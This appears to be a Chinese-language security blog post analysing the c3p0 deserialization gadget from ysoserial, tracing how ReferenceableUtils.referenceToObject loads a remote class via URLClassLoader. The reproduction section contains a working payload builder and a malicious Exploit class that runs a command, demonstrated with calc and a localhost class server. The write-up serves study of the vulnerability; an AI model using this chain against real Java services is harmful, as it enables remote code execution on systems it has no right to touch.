分析

首先是阅读神器ysoserial是怎样调用c3p0https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/C3P0.java

1
2

PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));

调用了com.mchange.v2.c3p0.PoolBackedDataSource,并把connectionPoolDataSource属性设置为PoolSource 寻找connectionPoolDataSource属性,最终在父类的父类中找到 image.png 那就重点看看这个类是怎样处理writeObjectreadObject image.png 因为PoolSource没有继承Serializable接口,所以会进入箭头所指的函数 image.pngReference对象经过ReferenceSerialized包装写入流中 因为用到了Referenceable接口的函数,所以PoolSource要同时实现ConnectionPoolDataSourceReferenceable writeObject的操作就是这样,接下来看看readObject image.png 因为PoolSource经过了ReferenceIndirector的包装,跟进ReferenceIndirector.getObject() image.png 继续跟进ReferenceableUtils.referenceToObject()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

    public static Object referenceToObject(Reference var0, Name var1, Context var2, Hashtable var3) throws NamingException {
        try {
            String var4 = var0.getFactoryClassName();
            String var11 = var0.getFactoryClassLocation();
            ClassLoader var6 = Thread.currentThread().getContextClassLoader();
            if (var6 == null) {
                var6 = ReferenceableUtils.class.getClassLoader();
            }

            Object var7;
            if (var11 == null) {
                var7 = var6;
            } else {
                URL var8 = new URL(var11);
                var7 = new URLClassLoader(new URL[]{var8}, var6);
            }

            Class var12 = Class.forName(var4, true, (ClassLoader)var7);
            ObjectFactory var9 = (ObjectFactory)var12.newInstance();
            return var9.getObjectInstance(var0, var1, var2, var3);
        } catch (Exception var10) {
            if (logger.isLoggable(MLevel.FINE)) {
                logger.log(MLevel.FINE, "Could not resolve Reference to Object!", var10);
            }

            NamingException var5 = new NamingException("Could not resolve Reference to Object!");
            var5.setRootCause(var10);
            throw var5;
        }
    }

可以发现URLClassLoader构造了一个从远程加载类的加载器,并且使用Class.forName来利用这个加载器从远程加载这个类 回到PoolSource image.png 因为实现了Referenceable,所以就能通过getReference函数来实现控制传进ReferenceableUtils.referenceToObject()的参数,也就是能够从远程地址加载恶意类了

复现

ysoserial的构造方法有点高级,为了学习,我不用ysoserial的构造payload的方法 首先编译一个恶意类,放到web目录下

1
2
3
4
5
6
7
8
9

public class Exploit {
	public Exploit(){
		try {
			Runtime.getRuntime().exec("calc");
		} catch (Exception e) {
		}

	}
}

然后构造payload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

import java.io.*;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;

import com.mchange.v2.c3p0.PoolBackedDataSource;

public class Test {

    public static void main(String []args) throws Exception {
        PoolBackedDataSource p = new PoolBackedDataSource();
        p.setConnectionPoolDataSource(new PoolSource("Exploit", "http://127.0.0.1:8080/"));

        // serialize
        FileOutputStream fos=new FileOutputStream("object");
        ObjectOutputStream os=new ObjectOutputStream(fos);
        os.writeObject(p);
        os.close();

        FileInputStream fis=new FileInputStream("object");
        ObjectInputStream ois=new ObjectInputStream(fis);
        // deserialize
        String obj2=(String)ois.readObject();
        System.out.println(obj2);
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            return new Reference("exploit", this.className, this.url);
        }
        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }
}

运行后就能执行calc,弹出计算器 image.png

参考

https://blog.csdn.net/fnmsd/article/details/88959428 https://paper.seebug.org/312